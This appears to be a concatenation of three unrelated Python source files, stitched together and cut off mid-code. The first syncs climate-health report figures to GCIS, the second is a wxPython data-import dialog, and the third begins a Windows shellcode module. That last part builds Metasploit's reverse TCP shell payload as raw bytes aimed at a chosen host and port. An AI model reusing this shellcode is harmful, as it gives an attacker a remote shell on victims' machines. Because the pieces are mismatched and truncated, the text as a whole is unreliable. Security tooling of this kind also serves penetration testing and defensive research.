('/metadata/figures/3658', 'life-cycle-of-blacklegged-ticks-ixodes-scapularis'), #5.3 #vectorborne-diseases
('/metadata/figures/3747', 'projected-change-in-lyme-disease-onset-week'), #5.4 #vectorborne-diseases
('/metadata/figures/3674', 'incidence-of-west-nile-neuroinvasive-disease-by-county-in-the-united-states'), #5.5 #vectorborne-diseases
('/metadata/figures/3675', 'climate-impacts-on-west-nile-virus-transmission'), #5.6 #vectorborne-diseases
]),
('water-related-illnesses', [
('/metadata/figures/3824', 'climate-change-and-health-vibrio'), #5.1 #water-related-illnesses
('/metadata/figures/3700', 'links-between-climate-change-water-quantity-and-quality-and-human-exposure-to-water-related-illness'), #5.2 #water-related-illnesses #TOO BIG
('/metadata/figures/3671', 'locations-of-livestock-and-projections-of-heavy-precipitation'), #5.3 #water-related-illnesses #TOO BIG
('/metadata/figures/3709', 'projections-of-vibrio-occurrence-and-abundance-in-chesapeake-bay'), #5.4 #water-related-illnesses
('/metadata/figures/3704', 'changes-in-suitable-coastal-vibrio-habitat-in-alaska'), #5.5 #water-related-illnesses
('/metadata/figures/3734', 'projected-changes-in-caribbean-gambierdiscus-species'), #5.6 #water-related-illnesses
('/metadata/figures/3712', 'projections-of-growth-of-alexandrium-in-puget-sound'), #5.7 #water-related-illnesses
]),
('food-safety-nutrition-and-distribution', [
('/metadata/figures/3579', 'farm-to-table'), #7.1 #food-safety-nutrition-and-distribution
# ('/metadata/figures/3600', 'mycotoxin-in-corn'), #7.1 #food-safety-nutrition-and-distribution BOX 1?
('/metadata/figures/3809', 'climate-change-and-health-salmonella'), #7.2 #food-safety-nutrition-and-distribution
('/metadata/figures/3748', 'seasonality-of-human-illnesses-associated-with-foodborne-pathogens'), #7.3 #food-safety-nutrition-and-distribution
('/metadata/figures/3688', 'effects-of-carbon-dioxide-on-protein-and-minerals'), #7.4 #food-safety-nutrition-and-distribution
('/metadata/figures/3597', 'mississippi-river-level-at-st-louis-missouri'), #7.5 #food-safety-nutrition-and-distribution
# ('/metadata/figures/3600', 'mycotoxin-in-corn'), #Box 7,1
# ('/metadata/figures/3806', 'low-water-conditions-on-mississippi-river')
]),
('mental-health-and-well-being', [
('/metadata/figures/3789', 'climate-change-and-mental-health'), #8.1 #mental-health-and-well-being
('/metadata/figures/3722', 'the-impact-of-climate-change-on-physical-mental-and-community-health'), #8.2 #mental-health-and-well-being
]),
('populations-of-concern', [
('/metadata/figures/3696', 'determinants-of-vulnerability'), #9.1 #populations-of-concern
('/metadata/figures/3917', 'intersection-of-social-determinants-of-health-and-vulnerability'), #9.2 #populations-of-concern
('/metadata/figures/3758', 'vulnerability-to-the-health-impacts-of-climate-change-at-different-lifestages'), #9.3 #populations-of-concern
('/metadata/figures/3714', 'mapping-social-vulnerability'), #9.4 #populations-of-concern
('/metadata/figures/3717', 'mapping-communities-vulnerable-to-heat-in-georgia'), #9.5 #populations-of-concern
]),
('appendix-1--technical-support-document', [
('/metadata/figures/3623', 'scenarios-of-future-temperature-rise'), #1.1 #climate-change-and-human-health
('/metadata/figures/3939', 'example-increasing-spatial-resolution-of-climate-models'), #1.2 #climate-change-and-human-health
('/metadata/figures/3638', 'sensitivity-analysis-of-differences-in-modeling-approaches'), #1.3 #climate-change-and-human-health
('/metadata/figures/3932', 'tsd-sources-of-uncertainty'), #1.4 #climate-change-and-human-health
])
])
}
def main():
print gcis.test_login()
image_id_map = pickle.load(open('image_id_cache.pk1', 'r'))
# regenerate_image_id_map(existing=image_id_map)
# create_health_report()
# create_cmip5_report()
for report_id in sync_metadata_tree:
for chapter_id in sync_metadata_tree[report_id]:
for survey_url, figure_id in sync_metadata_tree[report_id][chapter_id]:
figure, datasets = surveys.get_survey(survey_url, do_download=False)
resp = gcis.post_figure_original(report_id, figure_id, figure.original, chapter_id=chapter_id)
print(resp.status_code, resp.text)
# gcis_fig = gcis.get_figure(report_id, figure_id, chapter_id=chapter_id)
#
# print survey_url, gen_edit_link(survey_url)
#
# figure, datasets = surveys.get_survey(survey_url, do_download=False)
#
# #Override identifier
# figure.identifier = figure_id
#
# #Pull existing captions
# if gcis.figure_exists(report_id, figure_id, chapter_id=chapter_id):
# gcis_fig = gcis.get_figure(report_id, figure_id, chapter_id=chapter_id)
# figure.caption = gcis_fig.caption
# figure.files = gcis_fig.files
#
# realize_parents(gcis, figure.parents)
# realize_contributors(gcis, figure.contributors)
#
# print 'Contributors: ', figure.contributors
# print 'Parents: ', figure.parents
#
# for ds in [p for p in figure.parents if p.publication_type_identifier == 'dataset']:
# # Assign synthetic activity identifier to for datasets associated with figure
# if ds.activity and ds.activity.identifier is None:
# ds.activity.identifier = generate_activity_id(figure, ds.publication)
# print 'Dataset: ', ds.activity
#
# #Create the figure in GCIS
# # print 'Creating figure... ', gcis.create_figure(report_id, chapter_id, figure, skip_images=True, skip_upload=False)
# print 'Updating figure... ', gcis.update_figure(report_id, chapter_id, figure, skip_images=True)
# # print 'Deleting old file', gcis.delete_file(figure.files[0])
# # print 'Uploading...', gcis.upload_figure_file(report_id, chapter_id, figure_id, figure.local_path)
#
# for i in figure.images:
# i.identifier = image_id_map[(figure_id, i.identifier)]
# print '\t', i
#
# realize_parents(gcis, i.parents)
# realize_contributors(gcis, i.contributors)
#
# print '\t\tContributors: ', i.contributors
# print '\t\tParents: ', i.parents
# for ds in [p for p in i.parents if p.publication_type_identifier == 'dataset']:
# # Assign synthetic activity identifier to for datasets associated with images
# if ds.activity and ds.activity.identifier is None:
# ds.activity.identifier = generate_activity_id(i, ds.publication)
# print '\t\tDataset: ', ds, ds.activity
#
# #Create image in GCIS
# # print 'Creating image... ', gcis.create_image(i, report_id=report_id, figure_id=figure_id)
# print 'Updating image... ', gcis.update_image(i)
def gen_edit_link(survey_id):
node_id = survey_id.split('/')[-1]
return 'https://healthresources.globalchange.gov/node/' + node_id
def generate_activity_id(image, dataset):
try:
return '-'.join([image.identifier.split('-')[0], dataset.identifier, '-process'])
except Exception, e:
sys.stderr.write('WARNING: Activity identifier generation failed\n')
def regenerate_image_id_map(existing=None):
from uuid import uuid4
image_id_map = existing if existing else {}
for report_id in sync_metadata_tree:
for chapter_id in sync_metadata_tree[report_id]:
for survey_url, figure_id in sync_metadata_tree[report_id][chapter_id]:
s, ds = surveys.get_survey(survey_url, do_download=False)
for img in s.images:
if (figure_id, img.identifier) in image_id_map:
print 'skipping: ', (figure_id, img.identifier)
continue
else:
print 'added: ', (figure_id, img.identifier)
image_id_map[(figure_id, img.identifier)] = str(uuid4())
with open('image_id_cache.pk1', 'wb') as fout:
pickle.dump(image_id_map, fout)
print 'image_id_map regenerated'
def gen_survey_list():
realized_list = []
chapters = [c for c in sync_metadata_tree['usgcrp-climate-human-health-assessment-2016']]
survey_list = surveys.get_list()
for i, survey in enumerate(survey_list):
url = survey['url']
print 'Processing: {b}{url} ({i}/{total})'.format(b=surveys.base_url, url=url, i=i + 1, total=len(survey_list))
s = surveys.get_survey(url)
chp_id = chapters[s.chapter] if s and s.chapter else None
if s:
print s.identifier
print chp_id, s.figure_num, s.title
realized_list.append((chp_id, s.figure_num, s.identifier, s.title, url))
print ''
return realized_list
def create_health_report():
hr = Report({
'identifier': 'usgcrp-climate-human-health-assessment-2016',
'report_type_identifier': 'assessment',
'title': 'The Impacts of Climate Change on Human Health in the United States: A Scientific Assessment',
'url': 'http://www.globalchange.gov/health-assessment',
'publication_year': '2016',
'contact_email': 'healthreport@usgcrp.gov'
})
# ['report_identifier', 'identifier', 'number', 'title', 'url']
chapters = [
('executive-summary', None, 'Executive Summary'),
('climate-change-and-human-health', 1, 'Climate Change and Human Health'),
('temperature-related-death-and-illness', 2, 'Temperature-Related Death and Illness'),
('air-quality-impacts', 3, 'Air Quality Impacts'),
('extreme-events', 4, 'Impacts of Extreme Events on Human Health'),
('vectorborne-diseases', 5, 'Vectorborne Diseases'),
('water-related-illnesses', 6, 'Climate Impacts on Water-Related Illnesses'),
('food-safety--nutrition--and-distribution', 7, 'Food Safety, Nutrition, and Distribution'),
('mental-health-and-well-being', 8, 'Mental Health and Well-Being'),
('populations-of-concern', 9, 'Climate-Health Risk Factors and Populations of Concern'),
('appendix-1--technical-support-document', None, 'Appendix 1: Technical Support Document'),
('appendix-2--process-for-literature-review', None, 'Appendix 2: Process for Literature Review'),
('appendix-3--report-requirements-development-process-review-and-approval', None, 'Appendix 3: Report Requirements, Development Process, Review, and Approval'),
('appendix-4--documenting-uncertainty-confidence-and-likelihood', None, 'Appendix 4: Documenting Uncertainty: Confidence and Likelihood'),
('appendix-5--glossary-and-acronyms', None, 'Appendix 5: Glossary and Acronyms'),
('front-matter', None, 'Front Matter')
]
print gcis.create_report(hr)
for id, num, title in chapters:
ch = Chapter({
'identifier': id,
'number': num,
'title': title,
'report_identifier': hr.identifier
})
print gcis.create_chapter(hr.identifier, ch)
def create_cmip5_report():
cmip = Report({
'identifier': 'noaa-techreport-nesdis-144',
'report_type_identifier': 'report',
'title': 'Regional Surface Climate Conditions in CMIP3 and CMIP5 for the United States: Differences, Similarities, and Implications for the U.S. National Climate Assessment',
'publication_year': '2015'
})
print gcis.create_report(cmip)
chapters = [
('introduction', 1, 'Introduction'),
('data', 2, 'Data'),
('methods', 3, 'Methods'),
('temperature', 4, 'Temperature'),
('precipitation', 5, 'Precipitation'),
('summary', 6, 'Summary'),
('appendix', None, 'Appendix'),
('references', None, 'References'),
('acknowledgements', None, 'Acknowledgements'),
]
for id, num, title in chapters:
ch = Chapter({
'identifier': id,
'number': num,
'title': title,
'report_identifier': cmip.identifier
})
print gcis.create_chapter(cmip.identifier, ch)
main()
|
|
#!/usr/bin/python
"""
Import Data Frame
Copyright (c) 2014, 2015 Andrew Hawkins
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
"""
Import Declarations
"""
import datetime as dt
import threading as td
import wx
from forsteri.interface import data as idata
from forsteri.interface import sql as isql
from forsteri.process import bring as dec
"""
Constant Declarations
"""
"""
Frame Class
"""
class ImportFrame(wx.Frame):
"""
"""
def __init__(self, *args, **kwargs):
"""
Initialize the frame.
Args:
*args (): Any arguments to be passed directly to the super's
constructor.
**kwargs (): Any keyword arguments to be passed to the super's
constructor.
Returns:
ManagerFrame
"""
## Frame
# Initialize by the parent's constructor.
super(ImportFrame, self).__init__(*args, **kwargs)
# Create the master panel.
masterPanel = wx.Panel(self)
# Create the master sizer.
masterSizer = wx.BoxSizer(wx.VERTICAL)
## File Type
# Create the file static box.
fileSB = wx.StaticBox(masterPanel, label="File Information")
# Create the file sizer.
fileSizer = wx.StaticBoxSizer(fileSB, wx.VERTICAL)
# Create the file type sizer.
fileTypeSizer = wx.BoxSizer(wx.HORIZONTAL)
# Create the file type radio buttons.
self.timeseriesRB = wx.RadioButton(masterPanel, label="Timeseries",
style=wx.RB_GROUP)
singleRB = wx.RadioButton(masterPanel, label="Single Time")
# Add the radio buttons to the file type sizer.
fileTypeSizer.AddMany([self.timeseriesRB, (75, 0), singleRB])
# Bind the radio buttons to functions.
self.timeseriesRB.Bind(wx.EVT_RADIOBUTTON, self.onFile)
singleRB.Bind(wx.EVT_RADIOBUTTON, self.onFile)
## Date
# Create the date text sizer.
dateTextSizer = wx.BoxSizer(wx.HORIZONTAL)
# Create the static text.
self.dateText = [wx.StaticText(masterPanel, label="Date Format"),
wx.StaticText(masterPanel, label="Year"),
wx.StaticText(masterPanel, label="Month"),
wx.StaticText(masterPanel, label="Day")]
# Add the date text to the date text sizer.
spacers = [(50, 0), (85, 0), (35, 0), (20, 0)]
index = 0
for text in self.dateText:
# Add each static text with a spacer value.
dateTextSizer.AddMany([spacers[index], text])
# Set only the date entry to be disabled.
if index > 0:
text.Disable()
# Increment the index.
index += 1
# Create the date entry sizer.
dateEntrySizer = wx.BoxSizer(wx.HORIZONTAL)
# Get the choices for timeseries selection.
choices = [date[1:] for date in isql.getForVariable("Date") if
date[0] == '$']
currentDate = dt.date(1, 1, 1).today()
# Create the date entry forms.
self.dfEntry = wx.ComboBox(masterPanel, size=(150, -1),
choices=choices, style=wx.CB_READONLY|wx.CB_SORT)
self.stEntry = [wx.SpinCtrl(masterPanel, value=str(currentDate.year),
min=2000, max=currentDate.year, size=(75, -1))]
self.stEntry.append(wx.SpinCtrl(masterPanel,
value=str(currentDate.month), min=1, max=12, size=(50, -1)))
self.stEntry.append(wx.SpinCtrl(masterPanel,
value=str(currentDate.day), min=1, max=31, size=(50, -1)))
# Set the initial combo box selection.
self.dfEntry.SetSelection(0)
# Set the date entry forms to be disabled.
for index in range(0, 3):
self.stEntry[index].Disable()
# Bind the combo box selection to a function.
self.dfEntry.Bind(wx.EVT_COMBOBOX, self.onFile)
# Add the date entry items to the sizer.
dateEntrySizer.AddMany([self.dfEntry, (25, 0), self.stEntry[0],
(5, 0), self.stEntry[1], (5, 0), self.stEntry[2]])
## Last Selection
# Create the last selection sizer.
lastSizer = wx.BoxSizer(wx.HORIZONTAL)
## File Picker
# Create the file picker sizer.
filePickerSizer = wx.BoxSizer(wx.VERTICAL)
# Create the file picker text.
filePickerText = wx.StaticText(masterPanel, label="File Location")
# Create the file picker control.
self.filePicker = wx.FilePickerCtrl(masterPanel, path='',
wildcard="CSV files (*.csv)|*.csv|TXT files (*txt)|*.txt",
size=(250, -1), style=wx.FLP_FILE_MUST_EXIST)
self.filePicker.SetInitialDirectory(idata.DATA)
# Add the text and file picker to the file picker sizer.
filePickerSizer.Add(filePickerText, flag=wx.ALIGN_CENTER)
filePickerSizer.Add(self.filePicker, flag=wx.LEFT, border=5)
# Bind the selection of a file to a function.
self.filePicker.Bind(wx.EVT_FILEPICKER_CHANGED, self.onFile)
## Check Boxes
# Create the check sizer.
checkSizer = wx.BoxSizer(wx.VERTICAL)
# Create the check boxes.
self.shiftCheck = wx.CheckBox(masterPanel, label="Shift Week")
self.overwriteCheck = wx.CheckBox(masterPanel, label="Overwrite")
# Initially disable the Walmart week check box.
self.shiftCheck.Disable()
# Bind check boxes to functions.
self.shiftCheck.Bind(wx.EVT_CHECKBOX, self.onFile)
# Add the check boxes to the sizer.
checkSizer.Add(self.shiftCheck, flag=wx.RIGHT|wx.ALIGN_LEFT, border=5)
checkSizer.Add(self.overwriteCheck,
flag=wx.TOP|wx.RIGHT|wx.ALIGN_LEFT, border=5)
# Add the file picker and check sizers to the last sizer.
lastSizer.Add(filePickerSizer)
lastSizer.AddSpacer(25)
lastSizer.Add(checkSizer)
# Add everything to the file sizer.
fileSizer.Add(fileTypeSizer, flag=wx.TOP|wx.ALIGN_CENTER, border=5)
fileSizer.AddSpacer(10)
fileSizer.Add(dateTextSizer, flag=wx.ALIGN_LEFT)
fileSizer.Add(dateEntrySizer, flag=wx.ALIGN_CENTER)
fileSizer.AddSpacer(10)
fileSizer.Add(lastSizer, flag=wx.BOTTOM|wx.ALIGN_CENTER, border=5)
## File Analyzer
# Create the header static box.
headerSB = wx.StaticBox(masterPanel, label="Header Information")
# Create the header sizer.
headerSizer = wx.StaticBoxSizer(headerSB, wx.VERTICAL)
# Create the list control.
self.headerList = wx.ListCtrl(masterPanel, size=(544, 300),
style=wx.LC_REPORT|wx.LC_HRULES|wx.LC_VRULES|wx.BORDER_SUNKEN)
# Add columns to the list control.
self.headerList.InsertColumn(0, "Original", width=170)
self.headerList.InsertColumn(1, "Changed", width=170)
self.headerList.InsertColumn(2, "Reason", width=170)
# Bind double clicking a row to changing its match.
self.headerList.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.onHeader)
# Add the header list to the header sizer.
headerSizer.Add(self.headerList, flag=wx.ALL, border=5)
## Finish Buttons
# Create the finish sizer.
finishSizer = wx.BoxSizer(wx.HORIZONTAL)
# Create the buttons.
importButton = wx.Button(masterPanel, label="&Import")
cancelButton = wx.Button(masterPanel, id=wx.ID_CANCEL)
# Set the import button to be the default button.
importButton.SetDefault()
# Add the buttons to the finish sizer.
finishSizer.AddMany([importButton, (5, 0), cancelButton])
# Bind button presses to functions.
importButton.Bind(wx.EVT_BUTTON, self.onImport)
cancelButton.Bind(wx.EVT_BUTTON, self.onCancel)
## Frame Operations
# Add everything to the master sizer.
masterSizer.Add(fileSizer, flag=wx.TOP|wx.ALIGN_CENTER, border=5)
masterSizer.Add(headerSizer, flag=wx.ALL|wx.ALIGN_CENTER, border=5)
masterSizer.Add(finishSizer, flag=wx.RIGHT|wx.BOTTOM|wx.ALIGN_RIGHT,
border=5)
# Set the sizer for the master panel.
masterPanel.SetSizer(masterSizer)
# Bind closing the frame to a function.
self.Bind(wx.EVT_CLOSE, self.onClose)
# Set window properties.
self.SetSize((575, 580))
self.SetTitle("Import Data")
self.Centre()
self.Show(True)
"""
Helper Functions
"""
def displayChange(self, source, dateFormat):
"""
Show the old headers, what they were changed to, and why in the list
control.
Args:
source (str): The location of the file on the disk.
dateFormat (str): The format of the date(s).
Returns:
bool: True if successful, false otherwise.
"""
# Get the shift check.
shift = self.shiftCheck.GetValue()
# Decompose the file and extract the old and new headers.
(oldHeaders, self.newHeaders, self.hasDate, self.firstDate) =\
dec.decompose(source, dateFormat, shift)
# Create missing and ignored boolean lists.
reason = []
index = 0
for header in self.newHeaders:
if header != "Missing" and header != "Ignore":
reason.append("Match")
else:
reason.append(header)
self.newHeaders[index] = ''
# Increment the index.
index += 1
# Remove all items from the list control and reset the index.
self.headerList.DeleteAllItems()
index = 0
# Add the items to the list control.
for oldHeader in oldHeaders:
# Add the items to the list control.
self.headerList.InsertStringItem(index, oldHeader)
if self.newHeaders[index] == "Date":
self.headerList.SetStringItem(index, 1,
str(self.newHeaders[index]) + ": " + str(self.firstDate))
else:
self.headerList.SetStringItem(index, 1,
str(self.newHeaders[index]))
self.headerList.SetStringItem(index, 2, reason[index])
# Increment the index.
index += 1
return True
"""
Event Handler Functions
"""
def onHeader(self, event):
"""
"""
index = event.GetIndex()
data = [self.headerList.GetItemText(index, i) for i in [0, 1, 2]]
if data[2] == "Missing":
headerDlg = HeaderDialog(data, self)
headerDlg.ShowModal()
self.displayChange(self.filePicker.GetPath(),
self.dfEntry.GetValue())
else:
return
def onFile(self, event):
"""
"""
# Enable and disable the necessary widgets.
if self.timeseriesRB.GetValue():
# Enable the timeseries and disable the single time selections.
self.dateText[0].Enable()
self.dfEntry.Enable()
for index in range(0, 3):
self.dateText[index + 1].Disable()
self.stEntry[index].Disable()
# If a date format with week in it is selected enable walmart week.
if 'w' in self.dfEntry.GetValue():
self.shiftCheck.Enable()
else:
self.shiftCheck.Disable()
else:
# Enable the single time and disable the timeseries selections.
self.dateText[0].Disable()
self.dfEntry.Disable()
self.shiftCheck.Disable()
for index in range(0, 3):
self.dateText[index + 1].Enable()
self.stEntry[index].Enable()
# Get the file locations on the disk.
source = self.filePicker.GetPath()
# If the source is an empty string, return.
if source == '':
return
else:
# Route the file type to the proper input function.
if self.timeseriesRB.GetValue():
# Get the value selected for date format from the combo box.
dateFormat = self.dfEntry.GetValue()
else:
# Get the values input for the date of the file.
date = dt.date(self.stEntry[0].GetValue(),
self.stEntry[1].GetValue(), self.stEntry[2].GetValue())
dateFormat = ''
# Display the headers, what they were changed to, and why.
self.displayChange(source, dateFormat)
def onImport(self, event):
"""
"""
# Get the file locations on the disk.
source = self.filePicker.GetPath()
# Get whether or not to overwrite.
overwrite = self.overwriteCheck.GetValue()
# If no source has been selected, show an error message and return.
if source == '':
errorDialog = wx.MessageDialog(self,
"No input file was selected. Please select a file.", "Error",
wx.OK|wx.ICON_ERROR)
errorDialog.ShowModal()
return
# Check to make sure there is a date for the file.
if self.timeseriesRB.GetValue():
# Get the value selected for date format from the combo box.
dateFormat = self.dfEntry.GetValue()
if ("Date" in self.newHeaders or self.hasDate) and self.firstDate:
# Check if there is a date in the headers.
if type(self.newHeaders[-1]) == dt.date or\
type(self.newHeaders[-2]) == dt.date:
# Remove any empty strings from the headers list.
self.newHeaders = list(filter(('').__ne__,
self.newHeaders))
# Check if there are any repeat dates.
if len(self.newHeaders) != len(set(self.newHeaders)):
errorDialog = wx.MessageDialog(self,
"There are repeated dates in the header. Please " +
"consider reformatting.", "Error", wx.OK|wx.ICON_ERROR)
errorDialog.ShowModal()
return
# Create the variable selection dialog box.
variableDlg = VariableDialog(self)
# Show the variable dialog box.
if variableDlg.ShowModal() == wx.ID_CANCEL:
return
# Get the variable selected.
variable = variableDlg.getSelection()
# Destroy the variable dialog.
variableDlg.Destroy()
# Call the import timeseries function in a thread.
importThread = td.Thread(target=dec.importTimeseries,
args=(source, dateFormat, variable, overwrite))
importThread.start()
self.Close()
else:
# Get the shift check.
shift = self.shiftCheck.GetValue()
# Call the import timeseries function in a thread.
importThread = td.Thread(target=dec.importTimeseries2,
args=(source, dateFormat, overwrite, shift))
importThread.start()
self.Close()
else:
# Bad input for timeseries.
errorDialog = wx.MessageDialog(self,
"There was an issue with the date column(s). Consider " +
"switching to single time or revising the date format.",
"Error",
wx.OK|wx.ICON_ERROR)
errorDialog.ShowModal()
return
else:
if "Date" in self.newHeaders or self.hasDate:
# Bad input for single time.
errorDialog = wx.MessageDialog(self,
"There was an issue with the date of the file. Consider " +
"switching to timeseries.",
"Error",
wx.OK|wx.ICON_ERROR)
errorDialog.ShowModal()
return
elif len([x for x in self.newHeaders if x != '']) == 1:
# Bad input for single time.
errorDialog = wx.MessageDialog(self,
"There are too few variables to be imported. Consider " +
"switching to timeseries.",
"Error",
wx.OK|wx.ICON_ERROR)
errorDialog.ShowModal()
return
else:
# Get the date from the input.
date = dt.date(*(entry.GetValue() for entry in self.stEntry))
# Call the import timeseries function in a thread.
importThread = td.Thread(target=dec.importSingleTime,
args=(source, date, overwrite))
importThread.start()
self.Close()
"""
Helper Functions
"""
def convertVariable(self, variable):
"""
"""
varTemp = variable
return varTemp.replace(' ', '_').lower()
"""
Event Handler Functions
"""
def onCancel(self, event):
"""
"""
self.Close()
def onClose(self, event):
"""
"""
self.Destroy()
class VariableDialog(wx.Dialog):
"""
"""
def __init__(self, *args, **kwargs):
"""
"""
# Initialize by the parent's constructor.
super(VariableDialog, self).__init__(*args, **kwargs)
# Create the master panel.
masterPanel = wx.Panel(self)
# Create the master sizer.
masterSizer = wx.BoxSizer(wx.VERTICAL)
# Create the text to inform the user.
text = wx.StaticText(masterPanel, label="Please select the " +\
"appropriate variable that\n\t\t represents the file.")
# Get the list of variable choices.
choices = self.getChoices()
# Create the variable combo box.
self.varCombo = wx.ComboBox(masterPanel, size=(150, -1),
choices=choices, style=wx.CB_READONLY|wx.CB_SORT)
# Set the initial combo box selection.
self.varCombo.SetSelection(0)
# Create the finish sizer.
finishSizer = wx.BoxSizer(wx.HORIZONTAL)
# Create the finish buttons.
okButton = wx.Button(masterPanel, id=wx.ID_OK)
cancelButton = wx.Button(masterPanel, id=wx.ID_CANCEL)
# Add the finish buttons to the sizer.
finishSizer.AddMany([okButton, (5, 0), cancelButton])
# Add the text and combo box to the sizer.
masterSizer.Add(text, flag=wx.LEFT|wx.RIGHT|wx.TOP|wx.ALIGN_CENTER,
border=5)
masterSizer.AddSpacer(10)
masterSizer.Add(self.varCombo, flag=wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER,
border=5)
masterSizer.AddSpacer(9)
masterSizer.Add(wx.StaticLine(masterPanel, size=(290, 2)),
flag=wx.ALIGN_CENTER)
masterSizer.AddSpacer(9)
masterSizer.Add(finishSizer, flag=wx.RIGHT|wx.BOTTOM|wx.ALIGN_RIGHT,
border=5)
# Set the master sizer.
masterPanel.SetSizer(masterSizer)
# Set the size of the window.
self.SetSize((300, 155))
def getChoices(self):
"""
"""
# Get the list of variables.
variables = isql.getVariables()
# Convert each variable to be aestetically pleasing.
#variables = [variable.replace('_', ' ').title() for variable in\
# variables]
return variables
def getSelection(self):
"""
"""
# Get the value of the variable combo box.
return self.varCombo.GetValue()
class HeaderDialog(wx.Dialog):
"""
"""
def __init__(self, data, *args, **kwargs):
"""
"""
# Initialize by the parent's constructor.
super(HeaderDialog, self).__init__(*args, **kwargs)
# Create the master panel.
masterPanel = wx.Panel(self)
# Create the master sizer.
masterSizer = wx.BoxSizer(wx.VERTICAL)
# Create the text values.
text = wx.StaticText(masterPanel, label='Change "' + data[0] + '" to')
# Create the combo box for change selection.
self.changeCB = wx.ComboBox(masterPanel, value=data[1],
choices=isql.getVariables())
# Create the finish sizer.
finishSizer = wx.BoxSizer(wx.HORIZONTAL)
# Create the finish buttons.
okButton = wx.Button(masterPanel, id=wx.ID_OK)
cancelButton = wx.Button(masterPanel, id=wx.ID_CANCEL)
# Bind buttons to actions.
okButton.Bind(wx.EVT_BUTTON, self.onOK)
# Add the finish buttons to the sizer.
finishSizer.AddMany([okButton, (5, 0), cancelButton])
# Add everything to the master sizer.
masterSizer.Add(text, flag=wx.ALL|wx.ALIGN_CENTER, border=5)
masterSizer.Add(self.changeCB, flag=wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER,
border=5)
masterSizer.AddSpacer(9)
masterSizer.Add(wx.StaticLine(masterPanel, size=(290, 2)),
flag=wx.ALIGN_CENTER)
masterSizer.AddSpacer(9)
masterSizer.Add(finishSizer, flag=wx.RIGHT|wx.BOTTOM|wx.ALIGN_RIGHT,
border=5)
# Set the alias.
self.alias = data[0]
# Set the master sizer.
masterPanel.SetSizer(masterSizer)
# Set the size of the window.
self.SetSize((300, 150))
def onOK(self, event):
"""
"""
isql.addAlias(self.changeCB.GetStringSelection(), self.alias)
self.EndModal(wx.ID_OK)
"""
Start Application
"""
def main():
"""
When the file is called independently create and display the manager frame.
"""
app = wx.App()
ImportFrame(None, style=wx.DEFAULT_FRAME_STYLE^wx.RESIZE_BORDER)
app.MainLoop()
if __name__ == '__main__':
main()
|
|
"""
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
##########################################################
# BEGIN win32 shellcodes #
##########################################################
import struct
class winI32_shellcode():
"""
Windows Intel x32 shellcode class
"""
def __init__(self, host, port, supplied_shellcode):
# could take this out HOST/PORT and put into each shellcode function
self.host = host
self.port = port
self.supplied_shellcode = supplied_shellcode
self.shellcode1 = None
self.shellcode2 = None
self.hostip = None
self.stackpreserve = b"\x90\x90\x60\x9c"
self.stackrestore = b"\x9d\x61"
def __pack_ip_addresses(self):
hostocts = []
for i, octet in enumerate(self.host.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def reverse_shell_tcp(self):
"""
metasploit windows/shell_reverse_tcp
"""
self.shellcode1 = b"\xfc\xe8"
self.shellcode1 += b"\x89\x00\x00\x00"
self.shellcode1 += (b"\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
b"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
b"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
b"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
